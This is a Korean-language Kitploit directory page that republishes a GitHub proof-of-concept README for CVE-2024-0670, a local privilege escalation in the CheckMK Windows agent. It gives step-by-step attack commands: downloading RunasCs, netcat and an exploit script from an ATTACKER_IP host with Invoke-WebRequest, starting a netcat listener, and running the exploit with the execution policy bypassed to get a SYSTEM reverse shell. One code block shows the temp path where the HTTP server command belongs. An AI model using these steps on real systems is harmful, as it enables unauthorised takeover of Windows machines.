Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — 이 리포지토리에는 Windows용 CheckMK 에이전트에 영향을 미치는 로컬 권한 상승 취약점인 CVE-2024-0670에 대한 익스플로잇 데모가 포함되어 있습니다. 이 취약점을 통해 낮은 권한의 사용자가 MSI 복구 메커니즘에서 처리하는 쓰기 가능한 파일 경로를 악용하여 SYSTEM 권한을 획득할 수 있습니다. | Kitploit
도구/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

이 리포지토리에는 Windows용 CheckMK 에이전트에 영향을 미치는 로컬 권한 상승 취약점인 CVE-2024-0670에 대한 익스플로잇 데모가 포함되어 있습니다. 이 취약점을 통해 낮은 권한의 사용자가 MSI 복구 메커니즘에서 처리하는 쓰기 가능한 파일 경로를 악용하여 SYSTEM 권한을 획득할 수 있습니다.

저장소 보기
39개월 전아직 검토되지 않음

CVE-2024-0670 – CheckMK 에이전트 로컬 권한 상승 (PoC)

이 저장소에는 CheckMK Windows 에이전트의 로컬 권한 상승 취약점인 CVE-2024-0670에 대한 간단하고 깔끔한 개념 증명(PoC)이 포함되어 있습니다. 낮은 권한의 사용자는 MSI 복구 중 실행되는 쓰기 가능한 임시 파일 경로를 악용하여 SYSTEM 권한을 얻을 수 있습니다.

🔍 취약점 요약

  • 공급업체: Tribe29
  • CVE: CVE-2024-0670
  • 권고: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

MSI 복구 중 CheckMK는 다음 경로의 파일을 실행합니다:

root@kitploit:~
  C:\Windows\Temp\

일반 사용자가 예측 가능한 이름의 파일을 해당 위치에 배치할 수 있다면 NT AUTHORITY\SYSTEM 권한으로 명령을 실행할 수 있습니다.

이 익스플로잇은 여러 페이로드 파일 이름을 심고 MSI 복구를 트리거하여 SYSTEM 실행을 달성합니다.

📂 파일

root@kitploit:~
RunasCs.exe     → runas 대체 도구 (일반 텍스트 비밀번호 지원)
nc.exe          → Netcat (리버스 셸)
exploit.ps1     → CVE-2024-0670 익스플로잇 스크립트
README.md       → 문서

🛠 요구 사항

  • 낮은 권한의 Windows 사용자
  • PowerShell 활성화
  • CheckMK Windows 에이전트 설치
  • 파일 다운로드 가능
  • Python (간단한 HTTP 서버용)
  • 공격자 머신의 Netcat 리스너

📡 HTTP 서버 시작

root@kitploit:~
  C:\Windows\Temp\

📥 대상에 도구 다운로드

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 익스플로잇 실행

사용자 머신에서 리스너를 시작합니다:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

성공하면 SYSTEM 역방향 셸을 받게 됩니다.

🔧 RunasCs 수동 빌드 (선택 사항)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ 법적 고지

이 프로젝트는 교육 및 공인된 침투 테스트 목적으로만 사용됩니다. 불법적인 목적으로 사용하지 마십시오. 저자는 오용에 대해 책임지지 않습니다.

도구 다운로드